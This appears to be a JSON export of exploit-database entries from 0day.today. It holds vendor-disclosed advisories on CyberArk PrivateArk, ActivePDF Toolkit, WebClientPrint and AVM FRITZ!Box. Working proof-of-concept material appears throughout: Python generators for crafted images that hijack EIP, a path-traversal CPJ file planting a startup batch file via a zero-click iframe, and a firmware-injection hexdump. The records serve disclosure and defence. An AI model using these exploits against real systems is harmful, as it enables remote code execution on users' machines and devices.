requires\r\nnetwork access to a PrivateArk Password Vault. Although each request\r\nonly discloses about 50 bytes of memory, sustained exploitation will\r\nlikely reveal sensitive information at some point in time. This\r\ncritically undermines the primary purpose of the PrivateArk Password\r\nVault.\r\n \r\n \r\nTimeline\r\n========\r\n \r\n2017-11-24 Vulnerability identified\r\n2018-01-22 Customer approved disclosure to vendor\r\n2018-02-05 Vendor notified\r\n2018-04-06 CVE number requested\r\n2018-04-07 CVE number assigned\r\n2018-04-09 Advisory released\r\n \r\n \r\nReferences\r\n==========\r\n \r\n[1] http://lp.cyberark.com/rs/316-CZP-275/images/ds-enterprise-password-vault-11-15-17.pdf\r\n \r\n \r\nRedTeam Pentesting GmbH\r\n=======================\r\n \r\nRedTeam Pentesting offers individual penetration tests performed by a\r\nteam of specialised IT-security experts. Hereby, security weaknesses in\r\ncompany networks or products are uncovered and can be fixed immediately.\r\n \r\nAs there are only few experts in this field, RedTeam Pentesting wants to\r\nshare its knowledge and enhance the public knowledge with research in\r\nsecurity-related areas. The results are made available as public\r\nsecurity advisories.\r\n \r\nMore information about RedTeam Pentesting can be found at:\r\nhttps://www.redteam-pentesting.de/\r\n \r\n \r\nWorking at RedTeam Pentesting\r\n=============================\r\n \r\nRedTeam Pentesting is looking for penetration testers to join our team\r\nin Aachen, Germany. If you are interested please visit:\r\nhttps://www.redteam-pentesting.de/jobs/\r\n \r\n-- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Gesch\u00e4ftsf\u00fchrer: Patrick Hof, Jens Liebchen\n\n# 0day.today [2018-04-11] #", "sourceHref": "https://0day.today/exploit/30138", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-03-13T23:22:59", "references": [], "description": "Exploit for windows platform in category dos / poc", "edition": 1, "reporter": "Fran\u00e7ois Goichon", "published": "2018-02-28T00:00:00", "title": "ActivePDF Toolkit < 8.1.0.19023 - Multiple Memory Corruptions Exploit", "type": "zdt", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-7264"], "modified": "2018-02-28T00:00:00", "href": "https://0day.today/exploit/description/29910", "id": "1337DAY-ID-29910", "sourceData": "ActivePDF Toolkit < 8.1.0 multiple RCE\r\n\r\nIntroduction\r\n============\r\nThe ActivePDF Toolkit is a Windows library which enhances business\r\nprocesses to stamp, stitch, merge, form-fill, add digital signatures,\r\nbarcodes to PDF. Both .NET and native APIs are provided. Amongst many\r\nother operations, this library can be used by applications to transform\r\nimages to PDF files.\r\n\r\nMultiple vulnerabilities were identified in the Pictview image processing\r\nlibrary embedded by the Toolkit and signed by ActivePDF. They could allow\r\nremote attackers to compromise applications relying on the Toolkit to\r\nprocess untrusted images. Note that, while the example instances hereafter\r\nuse aexotica file types, the parser determines the image type from magic\r\nbytes, ignoring file extensions in most cases.\r\n\r\nCVE\r\n===\r\nCVE-2018-7264\r\n\r\nAffected versions\r\n=================\r\nActivePDF Toolkit before 8.1.0 (build 8.1.0.19023)\r\n\r\nAuthor\r\n======\r\nFranASSois Goichon - Google Security Team\r\n\r\nCVE-2018-7264\r\n=============\r\nActivePDF Toolkit < 8.1.0.19023 multiple RCE\r\n\r\nSummary\r\n-------\r\nAn image processing library embedded in the ActivePDF Toolkit product is\r\nprone to multiple BSS out-of-bound and signedess errors which can yield\r\ndirect EIP control by overwriting function pointers, error handling\r\nstructures or IAT entries. Note that the affected library does not enable\r\nASLR.\r\n\r\nReproduction\r\n------------\r\nThe following scripts can be used to generate crafted image files which\r\nachieve EIP control when parsed or converted by the ActivePDF Toolkit (e.g.\r\nvia the ImageToPDF method), through different root causes. These examples\r\ncan be reproduced through both the .NET and native APIs and independently\r\nfrom file extensions, however the .NET layer will hide the native crashes\r\nand return -1. This may crash the library with a lock on, so only use in\r\ntest environments.\r\n\r\n* Interchange File Format (.iff) and derivates\r\n---\r\n#!/usr/bin/env python2\r\n#\r\n# eax=28147510 ebx=00009c1c ecx=28147510 edx=00009c1c esi=28140e90\r\nedi=02930a6c\r\n# eip=41414141 esp=0061f264 ebp=0061f26c iopl=0 nv up ei pl nz na\r\npo nc\r\n# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b\r\nefl=00010202\r\n# 41414141 ?? ???\r\n\r\nfrom struct import pack\r\n\r\nheader = \"FORMXOXOILBM\"\r\n\r\nbodycontents = \"AAA\"\r\nbody = \"BODY\" + pack(\">I\", len(bodycontents)) + bodycontents\r\nwhile (len(body) % 2) == 1:\r\n body += \"\\x00\"\r\n\r\nbase = 0x28147510\r\npayload = pack(\"<I\", base).ljust(0x28151114 - base, \"A\") + pack(\"<I\", base)\r\ncmap = \"CMAP\" + pack(\">I\", len(payload)) + payload\r\nwhile (len(cmap) % 2) == 1:\r\n cmap += \"\\x00\"\r\n\r\noutp = header + cmap + body\r\nassert len(outp) >= 0x28\r\n\r\nwith open(\"test.iff\", \"wb\") as f:\r\n f.write(outp)\r\n---\r\n\r\n* Zoner Draw images (.zmf, .zbr)\r\n---\r\n#!/usr/bin/env python2\r\n#\r\n# eax=28151110 ebx=0000002e ecx=0000bc28 edx=2813eb10 esi=00000008\r\nedi=028e0a6c\r\n# eip=41414141 esp=2814550c ebp=41414141 iopl=0 nv up ei ng nz ac\r\npe cy\r\n# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b\r\nefl=00010297\r\n# 41414141 ?? ???\r\n\r\nfrom struct import pack\r\n\r\nheader = pack(\"<III\", 0x5c, 0xD4015ADD, 0x12345678)\r\nheader = header.ljust(9*4) + pack(\"<I\", 0x3c)\r\nheader = header.ljust(0x3c)\r\n\r\nbase = 0x2814550C\r\npayload = '\\x00' * (0x28151124 - base) + pack(\"<I\", base) + \"A\"*8\r\n\r\n# can be triggered by multiple formats\r\nheader2 = pack(\"<H\", 0x4d42)\r\nheader2 = header2.ljust(14) + pack(\"<I\", 50-14)\r\nheader2 = header2.ljust(28) + pack(\"<HI\", 0, 0)\r\nheader2 = header2.ljust(46) + pack(\"<I\", len(payload)/4 + 1)\r\n\r\noutp = header + header2 + payload\r\n\r\nwith open(\"test.zmf\", \"w\") as f:\r\n f.write(outp)\r\n---\r\n\r\n* Sun Raster images (.ras)\r\n---\r\n#!/usr/bin/python2\r\n#\r\n#WARNING: Stack pointer is outside the normal stack bounds. Stack unwinding\r\ncan be inaccurate.\r\n#eax=28151110 ebx=0000000c ecx=0000fc2d edx=2813eb10 esi=00000008\r\nedi=02880a6c\r\n#eip=41414141 esp=28141504 ebp=41414141 iopl=0 nv up ei ng nz ac pe\r\ncy\r\n#cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b\r\nefl=00010297\r\n#41414141 ?? ???\r\n\r\nfrom struct import pack\r\n\r\nheader = pack(\">IIIIIII\", 0x59A66A95, 0x100, 1, 8, 0, 2, 1)\r\n\r\nbase = 0x28141504\r\npayload = \"\".ljust(0x28151124 - base, \"\\x00\") + pack(\"<I\", base) + \"A\"*8\r\noutp = header + pack(\">I\", len(payload)+1) + payload\r\n\r\nwith open(\"test.ras\", \"wb\") as f:\r\n f.write(outp)\r\n---\r\n\r\n* Truevision Targa images (.bpx)\r\n---\r\n#!/usr/bin/env python2\r\n#\r\n#eax=28151110 ebx=00000004 ecx=00000008 edx=2813eb10 esi=00000008\r\nedi=028f0a6c\r\n#eip=41414141 esp=0061f2a0 ebp=0061f2e8 iopl=0 nv up ei ng nz ac pe\r\ncy\r\n#cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b\r\nefl=00010297\r\n#41414141 ?? ???\r\n\r\nfrom struct import pack\r\n\r\ntarget = 0x2815112C\r\npayload = \"AAAA\"\r\n\r\n# TGA / PIC / BPX\r\nbase = { 3: 0x28147510, 4: 0x2814550c }\r\nalign = None\r\nfor al in [3, 4]:\r\n if ((target - base[al]) % al) == 0:\r\n align = al\r\n break\r\nassert align\r\n\r\nheader = \"\\x00\\x01\\x00\"\r\nheader += pack(\"<H\", (target - base[align])/align)\r\nheader += pack(\"<H\", (len(payload)/align)+1)\r\nheader += chr(32 if align == 4 else 24)\r\nheader = header.ljust(16)\r\nheader += chr(1)\r\nheader = header.ljust(18)\r\n\r\nwith open(\"test.bpx\", \"wb\") as f:\r\n f.write(header + payload)\r\n---\r\n\r\nRemediation\r\n-----------\r\nUpgrade to ActivePDF Toolkit >= 8.1.0 (build 8.1.0.19023), which fixes the\r\nproblem by removing the affected image processing library. Note that this\r\nalso fixes the similar ZDI-16-354 vulnerability.\r\n\r\nFor more information and guidance, please contact the ActivePDF support\r\nthrough their portal (https://support.activepdf.com).\r\n\r\n\r\nDisclosure timeline\r\n===================\r\n2017/11/28 - Report sent to ActivePDF support\r\n2017/11/28 - Support acknowledges the issue and confirms that the library\r\nis scheduled to be removed from the product\r\n2018/01/29 - Received notification from the ActivePDF support that the\r\nPictview image processing library had been removed from ActivePDF in build\r\n8.1.0.19023\r\n2017/02/26 - Public disclosure\n\n# 0day.today [2018-03-13] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/29910"}, {"lastseen": "2018-04-02T09:34:18", "references": [], "description": "WebClientPrint Processor version 2.0.15.109 suffers from a remote code execution vulnerability via print jobs.", "edition": 1, "reporter": "RedTeam", "published": "2017-08-23T00:00:00", "title": "WebClientPrint Processor 2.0.15.190 Print Jobs Remote Code Execution Vulnerability", "type": "zdt", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-08-23T00:00:00", "href": "https://0day.today/exploit/description/28362", "id": "1337DAY-ID-28362", "sourceData": "Advisory: WebClientPrint Processor 2.0: Remote Code Execution via Print Jobs\r\n\r\nRedTeam Pentesting discovered that malicious print jobs can be used to\r\ntrigger a remote code execution vulnerability in WebClientPrint\r\nProcessor (WCPP). These print jobs may be distributed via specially\r\ncrafted websites and are processed without any user interaction as soon\r\nas the website is accessed.\r\n\r\nDetails\r\n=======\r\n\r\nProduct: Neodynamic WebClientPrint Processor\r\nAffected Versions: 2.0.15.109 (Microsoft Windows)\r\nFixed Versions: >= 2.0.15.910\r\nVulnerability Type: Remote Code Execution\r\nSecurity Risk: high\r\nVendor URL: http://www.neodynamic.com/\r\nVendor Status: fixed version released\r\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-008\r\nAdvisory Status: published\r\nCVE: GENERIC-MAP-NOMATCH\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH\r\n\r\n\r\nIntroduction\r\n============\r\n\r\nNeodynamic's WebClientPrint Processor is a client-side application which\r\nallows server-side applications to print documents on a client's printer\r\nwithout user interaction, bypassing the browser's print functionality.\r\nThe server-side application may be written in ASP.NET or PHP while on\r\nthe client-side multiple platforms and browsers are supported.\r\n\r\n\"Send raw data, text and native commands to client printers without\r\nshowing or displaying any print dialog box!\" (Neodynamic's website)\r\n\r\n\r\nMore Details\r\n============\r\n\r\nUpon installation under Microsoft Windows, WCPP registers itself as a\r\nhandler for the \"webclientprint\" URL scheme. Thus, any URL starting with\r\n\"webclientprint:\" is handled by WCPP. For example, entering\r\n\r\nwebclientprint:-about\r\n\r\nin the URL bar of a browser opens the about box of WCPP.\r\n\r\nIn order to automatically print a text file using WCPP, a URL such as\r\nthe following is requested (e.g. via JavaScript code or an iframe HTML\r\ntag in a website):\r\n\r\nwebclientprint:https://example.com/somedir/lorem.txt\r\n\r\nThe file lorem.txt conforms to Neodynamic's proprietary file format CPJ\r\nand contains the following data:\r\n\r\n-----------------------------------------------------------------------\r\n$ xxd lorem.txt\r\n00000000: 6370 6a02 fc0b 0000 070c 0000 7763 7050 cpj.........wcpP\r\n00000010: 463a 6632 3330 6262 3766 3965 3338 3437 F:f230bb7f9e3847\r\n00000020: 3633 6132 3765 6663 3565 6237 6633 6436 63a27efc5eb7f3d6\r\n00000030: 6661 2e54 5854 7c50 7269 6e74 6564 2042 fa.TXT|Printed B\r\n00000040: 7920 5765 6243 6c69 656e 7450 7269 6e74 y WebClientPrint\r\n00000050: 0d0a 3d3d 3d3d 3d3d 3d3d 3d3d 3d3d 3d3d ..==============\r\n00000060: 3d3d 3d3d 3d3d 3d3d 3d3d 3d0d 0a0d 0a4c ===========....L\r\n00000070: 6f72 656d 2069 7073 756d 2064 6f6c 6f72 orem ipsum dolor\r\n00000080: 2073 6974 2061 6d65 742c 2063 6f6e 7365 sit amet, conse\r\n00000090: 6374 6574 7572 2061 6469 7069 7363 696e ctetur adipiscin\r\n000000a0: 6720 656c 6974 2e20 4675 7363 6520 7572 g elit. Fusce ur\r\n[...]\r\n00000bc0: 6275 6c75 6d20 7675 6c70 7574 6174 6520 bulum vulputate\r\n00000bd0: 6d61 676e 6120 6772 6176 6964 6120 6e65 magna gravida ne\r\n00000be0: 7175 6520 696d 7065 7264 6965 7420 6163 que imperdiet ac\r\n00000bf0: 2076 6976 6572 7261 206e 756c 6c61 2073 viverra nulla s\r\n00000c00: 7573 6369 7069 742e 0150 4446 4372 6561 uscipit..PDFCrea\r\n00000c10: 746f 7241 636f 7069 616e 2054 6563 686e torAcopian Techn\r\n00000c20: 6963 616c 2043 6f6d 7061 6e79 202d 2031 ical Company - 1\r\n00000c30: 2057 6562 4170 7020 4c69 6320 2d20 3220 WebApp Lic - 2\r\n00000c40: 5765 6253 6572 7665 7220 4c69 637c xxxx WebServer Lic|xx\r\n00000c50: xxxx xxxx xxxx xxxx xxxx xxxx xxxx xxxx xxxxxxxxxxxxxxxx\r\n00000c60: xxxx xxxx xxxx xxxx xxxx xxxx xxxx xxxx xxxxxxxxxxxxxxxx\r\n00000c70: xxxx xxxx xxxx xxxxxx\r\n-----------------------------------------------------------------------\r\n\r\nIt was obtained from Neodynamic's online demo website[0]. Briefly, its\r\nstructure can be described as follows:\r\n\r\nOffset Size Usage\r\n-----------------------------------------------------------------------\r\n 0 3 magic bytes \"cpj\"\r\n 3 1 unknown\r\n 4 4 offset \"pc\" (32 bit LE) for printer configuration\r\n 8 4 offset \"lk\" (32 bit LE) for license key\r\n 0x0c 6 filename/content header \"wcpPF:\"\r\n 0x12 - filename and content separated by pipe (\"|\") character\r\npc+0x12 - printer configuration\r\nlk+0x12 - license key\r\n\r\nIn the example above, the file \"f230bb7f9e384763a27efc5eb7f3d6fa.TXT\"\r\nwould be printed on the printer with the name \"PDFCreator\". The license\r\nkey at the end of the file was intentionally redacted. Prior to\r\nprinting, the text file with the dummy content is created in the current\r\nuser's %TEMP% directory. Typically, this directory is located at:\r\n\r\nC:\\Users\\<user>\\AppData\\Local\\Temp\\\r\n\r\n\r\nProof of Concept\r\n================\r\n\r\nDuring RedTeam Pentesting's analysis of WCPP it was found that malicious\r\nCPJ files can be crafted that exploit a directory traversal bug in WCPP.\r\nSuch an example is given in the following hexdump, showing the file\r\nrce-user.txt:\r\n\r\n-----------------------------------------------------------------------\r\n$ xxd rce-user.txt\r\n00000000: 6370 6a02 0201 0000 0301 0000 7763 7050 cpj.........wcpP\r\n00000010: 463a 2e2e 5c2e 2e5c 526f 616d 696e 675c F:..\\..\\Roaming\\\r\n00000020: 4d69 6372 6f73 6f66 745c 5769 6e64 6f77 Microsoft\\Window\r\n00000030: 735c 5374 6172 7420 4d65 6e75 5c50 726f s\\Start Menu\\Pro\r\n00000040: 6772 616d 735c 5374 6172 7475 705c 5265 grams\\Startup\\Re\r\n00000050: 6454 6561 6d2e 6261 747c 4065 6368 6f20 dTeam.bat|@echo\r\n00000060: 6f66 660d 0a63 6c73 0d0a 6563 686f 2e0d off..cls..echo..\r\n00000070: 0a65 6368 6f20 5072 6f6f 662d 6f66 2d43 .echo Proof-of-C\r\n00000080: 6f6e 6365 7074 0d0a 6563 686f 202d 2d2d oncept..echo ---\r\n00000090: 2d2d 2d2d 2d2d 2d2d 2d2d 2d2d 2d0d 0a65 -------------..e\r\n000000a0: 6368 6f20 5265 6d6f 7465 2043 6f64 6520 cho Remote Code\r\n000000b0: 4578 6563 7574 696f 6e20 7669 6120 5765 Execution via We\r\n000000c0: 6243 6c69 656e 7450 7269 6e74 2076 322e bClientPrint v2.\r\n000000d0: 302e 3135 2e31 3039 0d0a 464f 5220 2f4c 0.15.109..FOR /L\r\n000000e0: 2025 2578 2049 4e20 2831 2c31 2c31 3829 %%x IN (1,1,18)\r\n000000f0: 2044 4f20 6563 686f 2e0d 0a73 7461 7274 DO echo...start\r\n00000100: 2063 616c 630d 0a70 6175 7365 0d0a 007c calc..pause...|\r\n-----------------------------------------------------------------------\r\n\r\nIn this example the filename is set to\r\n\r\n..\\..\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\RedTeam.bat\r\n\r\nwhich is appended to the %TEMP% directory as follows:\r\n\r\nC:\\Users\\<user>\\AppData\\Local\\Temp\\..\\..\\Roaming\\Microsoft\\Windows\\\r\nStart Menu\\Programs\\Startup\\RedTeam.bat\r\n\r\nAfter resolving the \"..\\..\\\" sequence contained in the filename, this\r\nyields the following path:\r\n\r\nC:\\Users\\<user>\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\\r\nStartup\\RedTeam.bat\r\n\r\nAs a consequence, the file content beginning at 0x5a is written to the\r\nfile RedTeam.bat in the current user's Startup folder. Therefore,\r\nRedTeam.bat will be executed once the affected user logs in again. As a\r\nproof of concept, a text will be displayed and Windows' calculator is\r\nexecuted.\r\n\r\nOn one hand, this exploit can be executed when the following URL is\r\nentered into the URL bar of a browser:\r\n\r\nwebclientprint:https://example.com/somedir/rce-user.txt\r\n\r\nOn the other hand, visiting users of a malicious website may be attacked\r\nwithout user interaction when the webclientprint URL is embedded into an\r\niframe as follows:\r\n\r\n-----------------------------------------------------------------------\r\n<html>\r\n<body>\r\n<iframe src=\"webclientprint:https://example.com/somedir/rce-user.txt\">\r\n</iframe>\r\n</body>\r\n</html>\r\n-----------------------------------------------------------------------\r\n\r\nThe proof of concept printed above contains no valid license key, so a\r\nnotification window is shown when the exploit is executed. However, this\r\ndoes not prevent successful exploitation. Attackers can easily add a\r\nvalid license key (e.g. by buying a license), so the window is not shown\r\nand there is no visual indication of exploitation anymore.\r\n\r\nThe proof of concept is designed to print using the default printer.\r\nSince WCPP does not seem to know how to print batch files, it exits\r\nsilently with the result that a successful attack does not print the\r\nbatch file.\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nAffected users should disable the WCPP handler and upgrade to a fixed\r\nversion as soon as possible.\r\n\r\n\r\nFix\r\n===\r\n\r\nInstall a WCPP version greater or equal to 2.0.15.910[1].\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nIf a user of WCPP visits an attacker-controlled website, arbitrary code\r\ncan be executed on the attacked user's computer. If a valid license key\r\nis provided, there is no visual indication of the ongoing attack.\r\nFurthermore, no user interaction is required to trigger the\r\nvulnerability once a malicious website is visited. It is therefore\r\nestimated that this vulnerability poses a high risk.\r\n\r\n\r\nTimeline\r\n========\r\n\r\n2015-08-24 Vulnerability identified\r\n2015-09-03 Customer approved disclosure to vendor\r\n2015-09-04 Asked vendor for security contact\r\n2015-09-04 CVE number requested\r\n2015-09-04 Vendor responded with security contact\r\n2015-09-07 Vendor notified\r\n2015-09-07 Vendor acknowledged receipt of advisory\r\n2015-09-15 Vendor released fixed version\r\n2015-09-16 Customer asked to wait with advisory release until all their\r\n clients are updated\r\n2017-07-31 Customer approved advisory release\r\n2017-08-22 Advisory released\r\n\r\n\r\nReferences\r\n==========\r\n\r\n[0] http://webclientprint.azurewebsites.net/\r\n[1] https://neodynamic.wordpress.com/2015/09/15/webclientprint-2-0-for-windows-clients-critical-update/\n\n# 0day.today [2018-04-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/28362"}, {"lastseen": "2018-02-06T23:19:44", "references": [], "edition": 2, "description": "The signature check of FRITZ!Box firmware images is flawed. Malicious code can be injected into firmware images without breaking the RSA signature. The code will be executed either if a manipulated firmware image is uploaded by the victim or if the victim confirms an update on the webinterface during a MITM attack.", "reporter": "RedTeam", "published": "2015-01-22T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "zdt", "title": "AVM FRITZ!Box Firmware Signature Bypass Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-8872"], "modified": "2015-01-22T00:00:00", "id": "1337DAY-ID-23171", "href": "https://0day.today/exploit/description/23171", "sourceData": "AVM FRITZ!Box: Firmware Signature Bypass\r\n\r\nThe signature check of FRITZ!Box firmware images is flawed. Malicious\r\ncode can be injected into firmware images without breaking the RSA\r\nsignature. The code will be executed either if a manipulated firmware\r\nimage is uploaded by the victim or if the victim confirms an update on\r\nthe webinterface during a MITM attack.\r\n\r\n\r\nDetails\r\n=======\r\n\r\nProduct: AVM FRITZ!Box 7490, 7390, 7270v3 and other models\r\nAffected Versions:\r\n FRITZ!Box 6810 LTE, since firmware 5.22,\r\n FRITZ!Box 6840 LTE, since firmware 5.23,\r\n other models, since firmware 5.50\r\nFixed Versions:\r\n FRITZ!Box 7270, since firmware 6.05,\r\n FRITZ!Box 7270v3, since firmware 6.05,\r\n FRITZ!Box 7240, since firmware 6.05,\r\n other models, since firmware 6.20\r\n\r\nVulnerability Type: Improper Verification of Cryptographic Signature\r\nSecurity Risk: medium\r\nVendor URL: http://avm.de\r\nVendor Status: fixed version released\r\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-010\r\nAdvisory Status: published\r\nCVE: CVE-2014-8872\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8872\r\n\r\n\r\nIntroduction\r\n============\r\n\r\nFRITZ!Box is the brand name of SOHO routers/CPEs manufactured by AVM\r\nGmbH. The FRITZ!Box usually combines features such as an xDSL modem\r\nfunctionality, routing, wifi access, VoIP, NAS and DECT.\r\n\r\n\r\nMore Details\r\n============\r\n\r\nAVM regularly publishes firmware updates to address bugs and to\r\nintroduce new features. Those updates are cryptographically signed to\r\navoid tampering. The firmware image can either be uploaded manually or\r\nthe FRITZ!Box downloads it semi-automatically from\r\nhttp://download.avm.de via unencrypted HTTP if a new version is\r\navailable.\r\n\r\nTechnically, AVM firmware images are tar files.\r\n\r\n $ tar --list --file FRITZ.Box_7490.113.06.05.image\r\n ./var/\r\n ./var/regelex\r\n ./var/install\r\n ./var/info.txt\r\n ./var/tmp/\r\n ./var/tmp/filesystem.image\r\n ./var/tmp/kernel.image\r\n ./var/chksum\r\n ./var/signature\r\n\r\nThe firmware image contains a shell script called ./var/install, which\r\nwill be invoked after successful verification of the image. It is\r\nresponsible for flashing the new firmware.\r\n\r\nIn a tar archive, each file is described by a 512 byte header followed\r\nby n*512 bytes of file content. The end of a tar archive is represented\r\nby 1024 null bytes after the last content block. In some cases, AVM\r\nappends up to 8 KiB of excess null bytes. The whole tar archive,\r\nincluding these additional null bytes, is covered by a cryptographic\r\nsignature that is stored in the file ./var/signature within the archive.\r\n\r\nThe file contains a 1024 bit RSA decrypted MD5 hash of the firmware\r\nimage. 1024 bytes of space (tar header+content) are normally allocated\r\nto the signature file. When calculating the MD5 hash, that space is\r\ntreated as null bytes.\r\n\r\nThe library libfwsign.so is responsible for the detection of the\r\nsignature file in the tar header of the uploaded firmware image. It uses\r\nthe strstr() function of the C standard library like this:\r\n\r\n if (strstr(filename, \"/var/signature\"))\r\n {\r\n // signature file found.\r\n // update hash with 512 + n*512 null bytes.\r\n } else {\r\n // signature file not found.\r\n // update hash with tar header and content of current file.\r\n }\r\n\r\nTherefore, any of the following names will be treated as a signature\r\nfile and null bytes instead of the real content will be fed to the MD5\r\nhash function:\r\n\r\n ./var/signature\r\n /var/signature\r\n /tmp/var/signature/example\r\n ./var/signature/.././var/install\r\n\r\nIf such a file is placed after the last legitimate content block (where\r\nat least 1024 signed null bytes reside), the library libfwsign.so will\r\ncompute the same MD5 hash as it would do for an unmodified firmware\r\nimage. As a result, the modified firmware image will pass the signature\r\nverification.\r\n\r\nThe fourth file name, ./var/signature/.././var/install, contains a\r\ndirectory traversal. When parsed by tar, a warning will be generated and\r\nanything from the start of the file name up to /../ will be omitted. The\r\ncontent of the file will be extracted to ./var/install and the original\r\n./var/install file will be overwritten.\r\n\r\nThus, an attacker could easily inject malicious code into ./var/install,\r\nwhich will be executed after the manipulated firmware image has passed\r\nthe signature verification.\r\n\r\n\r\nProof of Concept\r\n================\r\n\r\nThe following command manipulates the latest firmware image for the\r\nFRITZ!Box 7490. When uploaded to a vulnerable FRITZ!Box 7490, all LEDs\r\nof the device will flash constantly to indicate that code execution has\r\noccured.\r\n\r\n------------------------------------------------------------------------\r\n$ xxd -r - FRITZ.Box_7490.113.06.20.image <<EOF\r\n17f2600: 2e2f 7661 722f 7369 676e 6174 7572 652f ./var/signature/\r\n17f2610: 2e2e 2f2e 2f76 6172 2f69 6e73 7461 6c6c .././var/install\r\n17f2620: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n*\r\n17f2660: 0000 0000 3030 3030 3737 3700 3030 3030 ....0000777.0000\r\n17f2670: 3030 3000 3030 3030 3030 3000 3030 3030 000.0000000.0000\r\n17f2680: 3030 3031 3030 3000 3030 3030 3030 3032 0001000.00000002\r\n17f2690: 3430 3700 3031 3532 3037 0020 3000 0000 407.015207. 0...\r\n17f26a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n*\r\n17f2700: 0075 7374 6172 2020 0072 6f6f 7400 0000 .ustar .root...\r\n17f2710: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n17f2720: 0000 0000 0000 0000 0072 6f6f 7400 0000 .........root...\r\n17f2730: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n*\r\n17f2800: 2321 2f62 696e 2f73 680a 6563 686f 2022 #!/bin/sh.echo \"\r\n17f2810: 6c65 642d 6374 726c 2070 6f77 6572 5f6f led-ctrl power_o\r\n17f2820: 6666 0a6c 6564 2d63 7472 6c20 776c 616e ff.led-ctrl wlan\r\n17f2830: 5f6f 6666 0a6c 6564 2d63 7472 6c20 7570 _off.led-ctrl up\r\n17f2840: 6461 7465 5f6c 6564 313d 300a 6c65 642d date_led1=0.led-\r\n17f2850: 6374 726c 2068 6172 6477 6172 655f 6572 ctrl hardware_er\r\n17f2860: 726f 720a 642d 6374 726c 2075 7064 6174 ror.d-ctrl updat\r\n17f2870: 655f 6c65 6431 3d30 0a6c 6564 2d63 7472 e_led1=0.led-ctr\r\n17f2880: 6c20 6861 7264 7761 7265 5f65 7272 6f72 l hardware_error\r\n17f2890: 2220 3e20 2f76 6172 2f66 6c61 7368 2f64 \" > /var/flash/d\r\n17f28a0: 6562 7567 2e63 6667 0a65 7869 7420 310a ebug.cfg.exit 1.\r\n17f28b0: 2345 4f46 0a00 0000 0000 0000 0000 0000 #EOF............\r\n17f28c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n*\r\n17f29f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\nEOF\r\n------------------------------------------------------------------------\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nCheck each firmware image manually for multiple occurrences of the\r\nstring \"/var/signature\" in file names using tar --list.\r\n\r\n\r\nFix\r\n===\r\n\r\nUpgrade to a fixed firmware version. Before upgrading, check the new\r\nfirmware image for suspicious file names (see \"Workaround\"). AVM should\r\nsecure the distribution of firmware images with TLS to prevent MITM\r\nattacks.\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nThis vulnerability allows an attacker to inject arbitrary code into AVM\r\nfirmware images while maintaining its cryptographic signature. If the\r\nattacker is able to perform a Man-in-the-Middle attack between the AVM\r\nFRITZ!Box and http://download.avm.de/, firmware images can be\r\nmanipulated in transit. Otherwise, attackers need to trick their victims\r\ninto installing a malicious firmware image. While successful attacks\r\nresult in the full compromise of a device, they would typically require an\r\nattacker in a very strong position. The vulnerability is therefore\r\nconsidered to pose a medium risk.\r\n\r\n\r\nTimeline\r\n========\r\n\r\n2014-03-10 Vulnerability identified\r\n2014-03-12 Vendor notified\r\n2014-05-27 Vendor released fixed version for FRITZ!Box 7270v3\r\n2014-08-12 Vendor released fixed version for FRITZ!Box 7490\r\n2014-09-09 Vendor released fixed version for FRITZ!Box 7390\r\n2014-11-14 CVE number assigned\r\n2014-12-08 Vendor provided updated list of affected and fixed models/versions\r\n2014-12-15 Vendor finished releasing fixed versions for all current models\r\n2015-01-21 Advisory released\n\n# 0day.today [2018-02-06] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/23171"}]}
